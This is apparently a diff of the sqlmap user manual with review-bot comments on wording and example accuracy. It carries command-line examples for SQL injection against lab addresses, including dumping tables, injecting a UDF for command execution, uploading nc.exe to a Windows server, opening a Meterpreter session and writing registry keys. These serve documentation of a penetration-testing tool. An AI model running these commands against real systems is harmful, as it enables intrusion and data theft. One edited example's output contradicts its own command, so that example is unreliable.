@@ -361,7 +361,7 @@ <H2><A NAME="ss2.1">2.1</A> <A HREF="#toc2.1">Generic features</A>
361361requests (multi-threading)</ B > to speed up the blind SQL injection
362362techniques. Vice versa, it is also possible to specify the number of
363363seconds to hold between each HTTP(S) request. Others optimization switches
364- to speed up the exploitation are implemented as well .
364+ to speed up the exploitation are implemented too .
365365</ LI >
366366< LI > < B > HTTP < CODE > Cookie</ CODE > header</ B > string support, useful when the
367367web application requires authentication based upon cookies and you have
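Review bot: the replacement line keeps the stray space before the full stop ("implemented too ."); while this line is being touched, drop that space, and fix the unchanged context two lines up as well, where "Others optimization switches" should read "Other optimization switches". "as well" and "too" mean the same thing here, so the wording swap itself is neutral.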
@@ -1132,33 +1132,6 @@ <H3>Process Google dork results as target addresses</H3>
11321132parameters asking you if you want to test and inject on each possible
11331133affected URL.</ P >
11341134
1135- < P > Example of Google dorking with expression < CODE > site:yourdomain.com
1136- ext:php</ CODE > :</ P >
1137- < P >
1138- < BLOCKQUOTE > < CODE >
1139- < PRE >
1140- $ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1
1141-
1142- [hh:mm:38] [INFO] first request to Google to get the session cookie
1143- [hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
1144- testable hosts
1145- [hh:mm:41] [INFO] sqlmap got a total of 59 targets
1146- [hh:mm:40] [INFO] url 1:
1147- GET http://yourdomain.com/example1.php?foo=12, do you want to test this
1148- url? [y/N/q] n
1149- [hh:mm:43] [INFO] url 2:
1150- GET http://yourdomain.com/example2.php?bar=24, do you want to test this
1151- url? [y/N/q] n
1152- [hh:mm:42] [INFO] url 3:
1153- GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
1154- want to test this url? [y/N/q] y
1155- [hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
1156- [...]
1157- </ PRE >
1158- </ CODE > </ BLOCKQUOTE >
1159- </ P >
1160-
1161-
11621135< H3 > Load options from a configuration INI file</ H3 >
11631136
11641137< P > Switch: < CODE > -c</ CODE > </ P >
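Review bot: deleting the whole transcript leaves the "Process Google dork results as target addresses" section with no example of the -g switch, while every other switch in this patch keeps a worked example. If the block was removed because its log lines are out of order ("[hh:mm:41] [INFO] sqlmap got a total of 59 targets" is followed by "[hh:mm:40] [INFO] url 1:") or because "65 results" versus "59 of them are testable hosts" needed explaining, a trimmed version with consistent timestamps would serve readers better than nothing; at minimum keep the invocation line `$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1` so the switch's syntax is still shown.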
@@ -1403,7 +1376,7 @@ <H3>Filtering targets from provided proxy log using regular expression</H3>
14031376< P > Rather than using all hosts parsed from provided logs with switch
14041377< CODE > -l</ CODE > , you can specify valid Python regular expression to be used
14051378for filtering desired ones.</ P >
1406- < P > Example usage :</ P >
1379+ < P > Example of valid syntax :</ P >
14071380< P >
14081381< BLOCKQUOTE > < CODE >
14091382< PRE >
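Review bot: "Example of valid syntax" is a weaker heading than the original "Example usage": the block that follows is a complete invocation, not a syntax pattern, so the original wording is the more accurate one and the change reads as a regression. The unchanged context line above it is also missing an article and should read "you can specify a valid Python regular expression".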
@@ -1983,22 +1956,23 @@ <H3>Enumerate database table columns</H3>
19831956You can also provide the < CODE > -C</ CODE > option to specify the table columns
19841957name like the one you provided to be enumerated.</ P >
19851958
1986- < P > Example against a MySQL target:</ P >
1959+ < P > Example against a SQLite target:</ P >
19871960< P >
19881961< BLOCKQUOTE > < CODE >
19891962< PRE >
1990- $ python sqlmap.py -u "http://debiandev /sqlmap/mysql /get_int.php?id=1" --columns -D testdb \
1963+ $ python sqlmap.py -u "http://192.168.136.131 /sqlmap/sqlite /get_int.php?id=1" --columns -D testdb \
19911964 -T users -C name
19921965[...]
1993- Database: testdb
1966+ Database: SQLite_masterdb
19941967Table: users
1995- [2 columns]
1996- +---------+---------------+
1997- | Column | Type |
1998- +---------+---------------+
1999- | name | varchar(500) |
2000- | surname | varchar(1000) |
2001- +---------+---------------+
1968+ [3 columns]
1969+ +---------+---------+
1970+ | Column | Type |
1971+ +---------+---------+
1972+ | id | INTEGER |
1973+ | name | TEXT |
1974+ | surname | TEXT |
1975+ +---------+---------+
20021976</ PRE >
20031977</ CODE > </ BLOCKQUOTE >
20041978</ P >
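Review bot: the new output does not agree with the command that produces it. The invocation still passes `-D testdb` and `-C name`, but the result block now reports "Database: SQLite_masterdb" and lists three columns including `id`, which the LIKE-style filter described in the context lines ("columns name like the one you provided") would not match. In the MySQL version being replaced the database name matched (`-D testdb` / `Database: testdb`) and only `name` and `surname` were listed, both of which contain "name". Either adjust the command so it matches the output shown, or show only the columns the filter would return, and explain in the intro sentence why the reported database name differs from the one requested.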
@@ -2028,7 +2002,7 @@ <H3>Dump database table entries</H3>
20282002< P >
20292003< BLOCKQUOTE > < CODE >
20302004< PRE >
2031- $ python sqlmap.py -u "http://debiandev /sqlmap/firebird/get_int.php?id=1" --dump -T users
2005+ $ python sqlmap.py -u "http://192.168.136.131 /sqlmap/firebird/get_int.php?id=1" --dump -T users
20322006[...]
20332007Database: Firebird_masterdb
20342008Table: USERS
@@ -2208,41 +2182,11 @@ <H3>Inject custom user-defined functions (UDF)</H3>
22082182< P > These techniques are detailed in the white paper
22092183< A HREF ="http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-whitepaper-4633857 "> Advanced SQL injection to operating system full control</ A > .</ P >
22102184
2211- < P > Example against a PostgreSQL target:</ P >
2212- < P >
2213- < BLOCKQUOTE > < CODE >
2214- < PRE >
2215- $ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 --udf-inject -v 0
2216-
2217- [...]
2218- web application technology: PHP 5.2.6, Apache 2.2.9
2219- back-end DBMS: PostgreSQL
2220-
2221- which is the local path of the shared library? udf/postgresql/linux/8.4/lib_postgresqludf_sys.so
2222- how many user-defined functions do you want to create from the shared library? 1
2223- what is the name of the UDF number 1? sys_eval
2224- how many input parameters takes UDF 'sys_eval'? (default: 1)
2225- what is the data-type of input parameter number 1? (default: text)
2226- what is the data-type of the return value? (default: text)
2227- do you want to call your injected user-defined functions now? [Y/n/q] y
2228- which UDF do you want to call?
2229- [1] sys_eval
2230- [q] Quit
2231- > 1
2232- what is the value of the parameter number 1 (data-type: text)? echo test
2233- do you want to retrieve the return value of the UDF? [Y/n]
2234- return value: 'test'
2235-
2236- do you want to call this or another injected UDF? [Y/n] n
2237- do you want to remove UDF 'sys_eval'? [Y/n] y
2238- [12:00:10] [WARNING] remember that UDF shared object files saved on the file system can only
2239- be deleted manually
2240- </ PRE >
2241- </ CODE > </ BLOCKQUOTE >
2242- </ P >
2185+ < P > Use switch < CODE > -</ CODE > < CODE > -udf-inject</ CODE > and follow the instructions.</ P >
22432186
22442187< P > If you want, you can specify the shared library local file system path
2245- via command line using < CODE > -</ CODE > < CODE > -shared-lib</ CODE > option.</ P >
2188+ via command line too by using < CODE > -</ CODE > < CODE > -shared-lib</ CODE > option. Vice
2189+ versa sqlmap will ask you for the path at runtime.</ P >
22462190
22472191< P > This feature is available only when the database management system is
22482192MySQL or PostgreSQL.</ P >
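Review bot: the one-sentence replacement "Use switch --udf-inject and follow the instructions" drops the only description of what those instructions are. The removed transcript documented the prompts for the shared library path, the number of UDFs to create, each UDF's name, parameter count and data types, the option to call and then remove the UDF, and the closing warning that "UDF shared object files saved on the file system can only be deleted manually". That warning is the part a reader most needs when cleaning up after a test and should survive in prose even if the transcript goes. Separately, in the second paragraph "Vice versa sqlmap will ask you for the path at runtime" misuses "vice versa"; "Otherwise, sqlmap will ask you for the path at runtime" is what is meant, and it needs the comma.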
@@ -2271,7 +2215,7 @@ <H3>Read a file from the database server's file system</H3>
22712215< P >
22722216< BLOCKQUOTE > < CODE >
22732217< PRE >
2274- $ python sqlmap.py -u "http://192.168.136.131 /sqlmap/mssql/iis/get_str2.asp?name=luther" \
2218+ $ python sqlmap.py -u "http://192.168.136.129 /sqlmap/mssql/iis/get_str2.asp?name=luther" \
22752219 --file-read "C:/example.exe" -v 1
22762220
22772221[...]
@@ -2282,14 +2226,14 @@ <H3>Read a file from the database server's file system</H3>
22822226
22832227[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
22842228[hh:mm:50] [INFO] the SQL query provided returns 3 entries
2285- C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131 /files/C__example.exe'
2229+ C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.129 /files/C__example.exe'
22862230[...]
22872231
2288- $ ls -l output/192.168.136.131 /files/C__example.exe
2289- -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131 /files/C__example.exe
2232+ $ ls -l output/192.168.136.129 /files/C__example.exe
2233+ -rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129 /files/C__example.exe
22902234
2291- $ file output/192.168.136.131 /files/C__example.exe
2292- output/192.168.136.131 /files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
2235+ $ file output/192.168.136.129 /files/C__example.exe
2236+ output/192.168.136.129 /files/C__example.exe: PE32 executable for MS Windows (GUI) Intel
2293223780386 32-bit
22942238</ PRE >
22952239</ CODE > </ BLOCKQUOTE >
@@ -2320,7 +2264,7 @@ <H3>Upload a file to the database server's file system</H3>
23202264$ ls -l /tmp/nc.exe.packed
23212265-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
23222266
2323- $ python sqlmap.py -u "http://192.168.136.131 /sqlmap/mysql/get_int.aspx?id=1" --file-write \
2267+ $ python sqlmap.py -u "http://192.168.136.129 /sqlmap/mysql/get_int.aspx?id=1" --file-write \
23242268 "/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1
23252269
23262270[...]
@@ -2483,7 +2427,7 @@ <H3>Out-of-band stateful connection: Meterpreter & friends</H3>
24832427< P >
24842428< BLOCKQUOTE > < CODE >
24852429< PRE >
2486- $ python sqlmap.py -u "http://192.168.136.128 /sqlmap/mysql/get_int_51.aspx?id=1" \
2430+ $ python sqlmap.py -u "http://192.168.136.129 /sqlmap/mysql/get_int_51.aspx?id=1" \
24872431 --os-pwn -v 1 --msf-path /tmp/metasploit
24882432
24892433[...]
@@ -2552,7 +2496,7 @@ <H3>Auxiliary registry switches</H3>
25522496< P >
25532497< BLOCKQUOTE > < CODE >
25542498< PRE >
2555- $ python sqlmap.py -u http://192.168.136.128 /sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
2499+ $ python sqlmap.py -u http://192.168.136.129 /sqlmap/pgsql/get_int.aspx?id=1 --reg-add \
25562500 --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
25572501</ PRE >
25582502</ CODE > </ BLOCKQUOTE >